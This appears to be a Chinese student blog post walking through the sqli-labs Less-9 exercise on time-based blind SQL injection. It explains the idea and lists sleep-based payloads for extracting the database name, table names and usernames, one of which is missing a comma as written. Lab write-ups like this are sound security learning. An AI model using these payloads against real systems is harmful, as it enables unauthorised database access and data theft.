sqli(9)
less9--基于时间的GET单引号盲注
前言
重写博客是为了赶作业,现在已经下定决心考研了。以后这个博客只会记录我的数学、英语、数据结构学习记录了。我还是
想使劲冲一把,但是最近羁绊太多。很多作业(除了渗透),我都觉得很鸡肋。算了,放宽心。comfortable。
0x01 基本知识学习
无论输入什么都是原界面:
- 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。
- 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)。
0x02 实验开始
1.通过时间盲注得出本条语句是否正确,返回的时间和设定的时间差不多则语句是正确的。
原界面:
2.开始暴数据库名
?id=1' and if(ascii(substr(database(),1,1))>115,0,sleep(5))--+
ASCII码大于115是正确的,说明取115=“s”
3.暴表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 0,sleep(5))
4.爆字段和构造方法
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>100, 0,sleep(5)) #
记住,明年明年和你竞争的人有400万。。。
珍惜时间,只错一次